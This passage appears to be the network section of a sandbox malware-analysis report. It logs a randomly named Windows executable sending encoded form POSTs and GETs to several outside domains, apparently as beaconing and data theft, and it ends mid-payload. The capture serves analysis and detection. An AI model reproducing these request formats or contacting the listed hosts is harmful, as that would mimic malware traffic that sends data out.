                Data Raw: 68 48 3d 43 68 47 74 5a 36 31 72 50 4e 67 64 51 6f 45 4d 4e 30 79 42 6b 33 54 32 74 52 6e 6e 68 6a 56 45 72 49 5a 41 4c 6e 65 45 41 77 39 71 7a 54 50 41 67 39 77 49 31 52 4e 30 47 31 53 38 66 4a 4c 45 5a 2f 68 33 39 37 49 7a 48 67 47 6a 35 41 51 77 4b 37 35 72 78 42 31 6b 69 39 37 71 72 71 74 4e 7a 34 47 67 62 74 6d 6f 75 4a 58 51 73 59 75 4a 70 6b 34 53 79 52 43 50 35 62 4f 74 65 74 45 66 34 6c 66 65 72 45 72 79 6d 6f 2f 61 53 4c 7a 52 4f 6c 46 7a 61 73 47 66 6d 6b 62 58 6e 74 47 71 79 69 62 49 42 47 7a 50 52 4a 4c 74 62 72 54 43 32 4d 43 46 68 32 48 35 66 59 4b 38 61 41 70 49 37 71 4c 32 65 46 42 61 35 46 4e 2b 79 4f 43 74 2b 71 64 31 61 6b 56 65 43 67 43 43 70 6c 49 77 49 47 30 57 68 47 38 71 75 68 67 64 33 65 5a 32 50 4b 70 62 37 64 2f 4a 69 63 4f 62 6b 6e 73 48 33 4e 66 79 68 4a 4c 53 2f 49 58 33 43 75 4d 41 59 4d 4d 34 2f 58 44 34 6f 74 47 59 59 38 77 36 35 52 7a 43 70 54 65 69 50 59 58 53 67 6e 37 74 32 79 4c 38 33 4f 50 4b 68 4e 47 71 2f 74 50 76 66 61 6b 47 30 78 74 46 5a 2f 6f 74 79 35 4e [TRUNCATED]
                Data Ascii: hH=ChGtZ61rPNgdQoEMN0yBk3T2tRnnhjVErIZALneEAw9qzTPAg9wI1RN0G1S8fJLEZ/h397IzHgGj5AQwK75rxB1ki97qrqtNz4GgbtmouJXQsYuJpk4SyRCP5bOtetEf4lferErymo/aSLzROlFzasGfmkbXntGqyibIBGzPRJLtbrTC2MCFh2H5fYK8aApI7qL2eFBa5FN+yOCt+qd1akVeCgCCplIwIG0WhG8quhgd3eZ2PKpb7d/JicObknsH3NfyhJLS/IX3CuMAYMM4/XD4otGYY8w65RzCpTeiPYXSgn7t2yL83OPKhNGq/tPvfakG0xtFZ/oty5NjLgGix3nmuBoDlvCMwhB1WQ6yJn4upLBiMWOEFPQKByXRGY0L6mfOsXIZe+b/o2UT2AdPqUh3t6n1bQtB9gypX1x6DIOQKJeW2s5UqzXV5DV59A72HOFYzQ1Gi2cCV5FngR6WjSmrEtMeNFSjTYdpvwmf55vz+aWRHnD7G2dYIgg5ifoOR1VtNSVbb/hAAQFjVdL6lqWB8PqCYVQJzH/rHI2A+/4Iu0f5IvG1TVFjUkeFUJI4L22TFa9wvWCLibtGZPf0eZka/0Rkpo6yy9SVvb0lUVcRixDTmd3gvTS6kK3dZJip6oAaC2hUZXuXziUQxPPFfgyMNtPVvIpe3y7Q0P68+Sk4d+/Xc8PyuKubNc9en249GvXo1ttI3PCXX/Kq8em+XAvv+rIeMGXivn+xB2wFkzFYO/ZoznfS9a8CDNM4sqbIJB+N/iEmL1zBEicv076R566ufku33r7XgegWgYA4u4oelVFilD6tED7jfQt06CKVYPAfArypmjk149Y3qac/wMQUvHxXNm+ghh3IrS2Bzt3Yfnotx2o79io4X6CcqGEdciU9OLb424FUk+y6Wk7c6M1C4yaK1bFbdH3YPuUOjGOModjlE84yjnW0qHOAosAzJTTw+M3vewN5Z9w9iYHc5qTW/stO9E9etpk2PO4LUxZ3Z9vDe [TRUNCATED]
                Jul 3, 2024 08:53:46.523559093 CEST289INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Wed, 03 Jul 2024 06:53:46 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                4192.168.2.949718103.197.25.241801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:53:48.213387966 CEST468OUTGET /vfca/?hH=PjuNaM4rErgNDqYdGwCHqm/mvS3xhxVRtMFmVQvGZApPshrl2us8sSNvZzeSfqXaMpgL6dVjOwb89B84ObwJ1CB2sMjpnb8Z8ua1HdSGi7DVkOqV+A==&4Z=FRPPB0TP0VK82R4 HTTP/1.1
                Host: www.dxgsf.shop
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:53:49.313640118 CEST289INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Wed, 03 Jul 2024 06:53:48 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                5192.168.2.94971991.195.240.19801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:53:54.381542921 CEST758OUTPOST /gvk0/ HTTP/1.1
                Host: www.dennisrosenberg.studio
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 191
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.dennisrosenberg.studio
                Referer: http://www.dennisrosenberg.studio/gvk0/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 43 44 4d 66 6e 49 38 43 61 6c 7a 6f 78 6a 48 79 6a 52 64 73 74 44 7a 4b 75 47 4f 75 37 54 48 78 30 7a 70 33 58 68 68 44 59 4d 43 73 4a 33 76 49 73 70 50 74 6c 34 69 56 6d 31 37 71 71 39 4e 79 6b 4a 51 73 34 74 6d 32 35 4d 48 44 62 36 67 4d 70 71 69 4d 56 42 6a 79 70 74 76 67 77 47 6e 6e 46 65 4c 71 59 36 4f 6c 45 4f 78 42 79 7a 33 47 6c 57 4a 69 74 6f 76 62 53 51 48 61 2f 2b 4b 74 37 68 6b 7a 63 45 73 4a 38 58 76 6d 75 42 53 56 4b 54 68 69 73 49 73 59 6f 62 37 79 67 66 45 4c 44 58 72 71 78 2b 71 6c 49 42 54 53 58 6f 79 34 43 4b 58 67 7a 5a 63 52 4e 71 62 79
                Data Ascii: hH=CDMfnI8CalzoxjHyjRdstDzKuGOu7THx0zp3XhhDYMCsJ3vIspPtl4iVm17qq9NykJQs4tm25MHDb6gMpqiMVBjyptvgwGnnFeLqY6OlEOxByz3GlWJitovbSQHa/+Kt7hkzcEsJ8XvmuBSVKThisIsYob7ygfELDXrqx+qlIBTSXoy4CKXgzZcRNqby
                Jul 3, 2024 08:53:55.015577078 CEST305INHTTP/1.1 405 Not Allowed
                date: Wed, 03 Jul 2024 06:53:54 GMT
                content-type: text/html
                content-length: 154
                server: Parking/1.0
                connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                6192.168.2.94972091.195.240.19801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:53:56.921708107 CEST782OUTPOST /gvk0/ HTTP/1.1
                Host: www.dennisrosenberg.studio
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 215
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.dennisrosenberg.studio
                Referer: http://www.dennisrosenberg.studio/gvk0/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 43 44 4d 66 6e 49 38 43 61 6c 7a 6f 2b 6a 33 79 68 79 6c 73 38 7a 7a 4a 68 6d 4f 75 69 6a 48 31 30 7a 31 33 58 6c 5a 54 59 5a 71 73 4a 54 6a 49 2b 38 7a 74 31 6f 69 56 75 56 37 76 75 39 4d 2b 6b 4a 4d 4f 34 73 32 32 35 4d 44 44 62 34 6f 4d 70 35 4b 4e 55 52 6a 77 77 64 76 2b 30 47 6e 6e 46 65 4c 71 59 37 72 49 45 4f 70 42 79 69 48 47 33 79 39 6c 75 6f 76 63 62 77 48 61 75 75 4b 78 37 68 6c 6b 63 46 41 7a 38 56 58 6d 75 44 4b 56 4a 43 68 74 35 59 73 65 32 62 36 7a 6d 4f 74 34 61 77 6d 30 32 50 6e 48 52 54 58 70 55 4a 53 6d 54 34 65 37 6d 4f 63 32 4b 4e 53 61 42 4f 67 34 41 67 5a 46 65 78 4d 4d 50 57 54 6e 41 43 44 31 71 51 3d 3d
                Data Ascii: hH=CDMfnI8Calzo+j3yhyls8zzJhmOuijH10z13XlZTYZqsJTjI+8zt1oiVuV7vu9M+kJMO4s225MDDb4oMp5KNURjwwdv+0GnnFeLqY7rIEOpByiHG3y9luovcbwHauuKx7hlkcFAz8VXmuDKVJCht5Yse2b6zmOt4awm02PnHRTXpUJSmT4e7mOc2KNSaBOg4AgZFexMMPWTnACD1qQ==
                Jul 3, 2024 08:53:57.567919970 CEST305INHTTP/1.1 405 Not Allowed
                date: Wed, 03 Jul 2024 06:53:57 GMT
                content-type: text/html
                content-length: 154
                server: Parking/1.0
                connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                7192.168.2.94972191.195.240.19801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:53:59.471044064 CEST1795OUTPOST /gvk0/ HTTP/1.1
                Host: www.dennisrosenberg.studio
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 1227
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.dennisrosenberg.studio
                Referer: http://www.dennisrosenberg.studio/gvk0/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 43 44 4d 66 6e 49 38 43 61 6c 7a 6f 2b 6a 33 79 68 79 6c 73 38 7a 7a 4a 68 6d 4f 75 69 6a 48 31 30 7a 31 33 58 6c 5a 54 59 5a 79 73 4a 67 72 49 73 4c 6e 74 32 6f 69 56 76 56 37 75 75 39 4d 33 6b 4a 55 4b 34 73 36 35 35 50 72 44 59 62 77 4d 35 59 4b 4e 64 52 6a 77 34 39 76 2f 77 47 6d 74 46 65 37 75 59 36 62 49 45 4f 70 42 79 67 66 47 68 57 4a 6c 6f 6f 76 62 53 51 47 62 2f 2b 4b 56 37 68 38 52 63 46 31 45 38 6c 33 6d 70 6a 61 56 49 30 56 74 6b 6f 73 63 69 37 37 67 6d 4f 78 6e 61 32 44 4e 32 50 53 67 52 52 33 70 43 74 2f 74 47 38 4f 74 77 76 73 5a 4e 4b 4b 34 50 37 77 36 4b 69 6f 38 41 79 56 6f 54 54 7a 78 4f 41 43 73 36 49 58 6e 62 4a 37 52 41 4f 49 73 56 66 37 31 33 6b 78 64 75 78 32 44 34 61 59 4d 51 58 68 65 44 5a 52 4b 31 32 46 48 73 7a 48 76 46 72 70 31 43 33 48 5a 4a 47 35 57 65 76 2b 41 6f 6e 64 6e 39 50 6b 78 4c 42 4d 5a 61 48 6e 37 54 71 4d 66 64 42 72 39 6f 31 33 4e 68 52 79 74 38 4a 73 48 67 32 54 72 44 66 73 71 63 50 44 4c 73 71 41 4d 52 53 7a 4a 67 62 43 35 48 4d 61 38 6c 6e 53 [TRUNCATED]
                Data Ascii: hH=CDMfnI8Calzo+j3yhyls8zzJhmOuijH10z13XlZTYZysJgrIsLnt2oiVvV7uu9M3kJUK4s655PrDYbwM5YKNdRjw49v/wGmtFe7uY6bIEOpBygfGhWJloovbSQGb/+KV7h8RcF1E8l3mpjaVI0Vtkosci77gmOxna2DN2PSgRR3pCt/tG8OtwvsZNKK4P7w6Kio8AyVoTTzxOACs6IXnbJ7RAOIsVf713kxdux2D4aYMQXheDZRK12FHszHvFrp1C3HZJG5Wev+Aondn9PkxLBMZaHn7TqMfdBr9o13NhRyt8JsHg2TrDfsqcPDLsqAMRSzJgbC5HMa8lnS/TTKe+wUeTKUK6uS6l55bA484kkn0tANyOfqDCoOU1rZNh24CBgO54pP0eKUhJFjd5SkkUeMF1OgxMuTMmnUoSltfJ6vbP6d0aui3ZURq475j6uhoH+mAnnY7Y1tG0paSM2iEi4UH1n0N8Bj0/CaiQwkctBoNdPyd97JBk/mdH3C43ARpP3NpaUjL6mXMcw5LIHc6FWxLHg2U5uIUPrhQiEBtegPI1LbWYmsTT6M03NEH9rsqnsVydVD92KECvTRMPzc3en0TIvnDO6lI7Vrt8brtqeWvnE9U8FgclLh3Uc6xRO5wcWluCWOVr3BdSfhhjl2iWVfHDONqDNndDZH2IFtipHUNyrsXayt7PQEvVTB1pkMwspd6K67ukadEBrCj07LtpvvIx0jPTBXfp/oU2ncmGLgkRV+mPzBuwPh6NZVjaUG0uT63F1TMuQNpKIahBMXgfVjG5gcQHKJwIqCquV0zoL7HdiDaFq9fK+eWeHe3cylGQDJBvnu9sWWnqougzvPIzVRlWUjXF1+ix1pyezXWcpsYrL9KBOoJkPh88M8vwlDW+PyZvhSGm05iJz5Cdv7XWDjOwg3GeUkcAiQZwHEKXat/8TTGKtERVcrMytoCmN4rCUOeiLLXFz+ngtg6+clxPGES/7LuK4Uu+3JEjsRdZk/mzjx26 [TRUNCATED]
                Jul 3, 2024 08:54:00.123451948 CEST305INHTTP/1.1 405 Not Allowed
                date: Wed, 03 Jul 2024 06:54:00 GMT
                content-type: text/html
                content-length: 154
                server: Parking/1.0
                connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                8192.168.2.94972291.195.240.19801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:54:02.020833969 CEST480OUTGET /gvk0/?4Z=FRPPB0TP0VK82R4&hH=PBk/k+wnSgDApBLvvStJ1Qfqn2+N7jbU3UJKISJwHJXOTy3qrqzF3aeAlE7aotAu8uhq4eiBm9zMPuEZ1b+PfRrn1v/W9n6lJorEOJ3pO998ixm+1g== HTTP/1.1
                Host: www.dennisrosenberg.studio
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:54:02.654025078 CEST113INHTTP/1.1 439
                date: Wed, 03 Jul 2024 06:54:02 GMT
                content-length: 0
                server: Parking/1.0
                connection: close


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                9192.168.2.949723212.227.172.254801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:54:15.772854090 CEST758OUTPOST /4ksh/ HTTP/1.1
                Host: www.ennerdaledevcons.co.uk
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 191
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.ennerdaledevcons.co.uk
                Referer: http://www.ennerdaledevcons.co.uk/4ksh/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 5a 54 4f 49 42 4f 76 4e 58 61 53 7a 6e 31 6c 31 33 6f 54 36 44 50 79 62 48 71 54 48 58 34 33 43 44 51 34 55 51 39 78 77 45 48 66 65 44 32 2f 42 4b 66 71 36 2f 66 59 6d 45 39 58 6f 63 47 70 6c 36 56 71 6f 4f 6e 74 50 37 4f 5a 62 4e 6f 4a 35 46 6e 38 68 56 32 66 31 4a 48 71 4e 31 6f 63 4b 4e 66 74 46 55 75 33 74 4e 34 56 6a 4d 4d 73 48 6c 4b 50 35 79 65 79 36 75 44 37 4f 42 7a 36 69 2f 4c 66 39 49 30 36 37 53 53 77 75 62 43 66 55 33 70 66 44 78 51 4f 65 75 30 42 4c 6b 6f 77 38 64 43 73 6d 72 69 42 67 37 55 4e 59 61 33 48 70 4a 35 51 32 43 65 6e 52 55 36 50 6f
                Data Ascii: hH=ZTOIBOvNXaSzn1l13oT6DPybHqTHX43CDQ4UQ9xwEHfeD2/BKfq6/fYmE9XocGpl6VqoOntP7OZbNoJ5Fn8hV2f1JHqN1ocKNftFUu3tN4VjMMsHlKP5yey6uD7OBz6i/Lf9I067SSwubCfU3pfDxQOeu0BLkow8dCsmriBg7UNYa3HpJ5Q2CenRU6Po
                Jul 3, 2024 08:54:16.396599054 CEST434INHTTP/1.1 301 Moved Permanently
                Server: nginx
                Date: Wed, 03 Jul 2024 06:54:16 GMT
                Content-Type: text/html
                Content-Length: 162
                Connection: close
                Location: https://www.ennerdaledevcons.co.uk/4ksh/
                Expires: Wed, 03 Jul 2024 07:14:16 GMT
                Cache-Control: max-age=1200
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                10192.168.2.949724212.227.172.254801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:54:18.312500954 CEST782OUTPOST /4ksh/ HTTP/1.1
                Host: www.ennerdaledevcons.co.uk
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 215
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.ennerdaledevcons.co.uk
                Referer: http://www.ennerdaledevcons.co.uk/4ksh/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 5a 54 4f 49 42 4f 76 4e 58 61 53 7a 6f 31 35 31 37 71 37 36 46 76 79 63 62 36 54 48 5a 59 32 4a 44 58 77 55 51 38 30 31 48 78 50 65 47 6e 6a 42 4c 65 71 36 79 2f 59 6d 50 64 58 70 53 6d 6f 6e 36 56 6d 4f 4f 6c 4a 50 37 4b 35 62 4e 70 35 35 47 51 41 2b 55 6d 66 33 64 33 71 44 36 49 63 4b 4e 66 74 46 55 71 61 43 4e 34 4e 6a 4d 38 38 48 6b 72 50 36 2f 2b 79 35 70 44 37 4f 46 7a 36 75 2f 4c 66 50 49 31 6d 46 53 55 30 75 62 41 33 55 33 39 7a 41 2f 51 4f 59 7a 45 41 5a 71 59 78 46 53 68 30 6b 74 46 6c 66 75 58 78 66 55 32 6e 33 59 4c 5a 74 58 4a 6e 32 54 64 47 41 74 30 43 69 53 51 71 69 72 6f 44 2f 38 77 52 38 4f 49 77 75 52 67 3d 3d
                Data Ascii: hH=ZTOIBOvNXaSzo1517q76Fvycb6THZY2JDXwUQ801HxPeGnjBLeq6y/YmPdXpSmon6VmOOlJP7K5bNp55GQA+Umf3d3qD6IcKNftFUqaCN4NjM88HkrP6/+y5pD7OFz6u/LfPI1mFSU0ubA3U39zA/QOYzEAZqYxFSh0ktFlfuXxfU2n3YLZtXJn2TdGAt0CiSQqiroD/8wR8OIwuRg==
                Jul 3, 2024 08:54:18.945698977 CEST434INHTTP/1.1 301 Moved Permanently
                Server: nginx
                Date: Wed, 03 Jul 2024 06:54:18 GMT
                Content-Type: text/html
                Content-Length: 162
                Connection: close
                Location: https://www.ennerdaledevcons.co.uk/4ksh/
                Expires: Wed, 03 Jul 2024 07:14:18 GMT
                Cache-Control: max-age=1200
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                11192.168.2.949725212.227.172.254801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:54:20.854440928 CEST1795OUTPOST /4ksh/ HTTP/1.1
                Host: www.ennerdaledevcons.co.uk
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 1227
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.ennerdaledevcons.co.uk
                Referer: http://www.ennerdaledevcons.co.uk/4ksh/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 5a 54 4f 49 42 4f 76 4e 58 61 53 7a 6f 31 35 31 37 71 37 36 46 76 79 63 62 36 54 48 5a 59 32 4a 44 58 77 55 51 38 30 31 48 78 48 65 47 31 48 42 4b 35 32 36 39 66 59 6d 43 39 58 30 53 6d 70 2f 36 56 4f 4b 4f 6c 45 79 37 4d 31 62 4f 50 46 35 48 6b 55 2b 62 6d 66 33 66 33 71 4f 31 6f 63 66 4e 66 38 4d 55 71 71 43 4e 34 4e 6a 4d 36 34 48 6a 36 50 36 73 4f 79 36 75 44 37 38 42 7a 36 43 2f 4c 47 34 49 31 69 56 53 45 55 75 65 51 6e 55 34 75 4c 41 67 41 4f 61 79 45 42 63 71 59 39 6b 53 68 34 6f 74 41 5a 31 75 55 68 66 56 51 54 76 4b 62 42 55 50 70 58 6e 45 71 32 43 76 43 65 32 53 53 58 74 30 49 76 4a 75 41 59 70 61 4c 5a 38 42 70 4d 39 56 6b 31 4b 4c 33 38 6a 76 66 74 78 49 4c 5a 67 67 4c 34 38 34 4c 54 36 79 79 31 35 75 54 2f 52 75 74 4b 45 2b 6c 61 31 39 49 34 71 78 50 6c 6d 6c 6d 6e 33 33 2f 34 55 44 48 6a 72 6c 6b 31 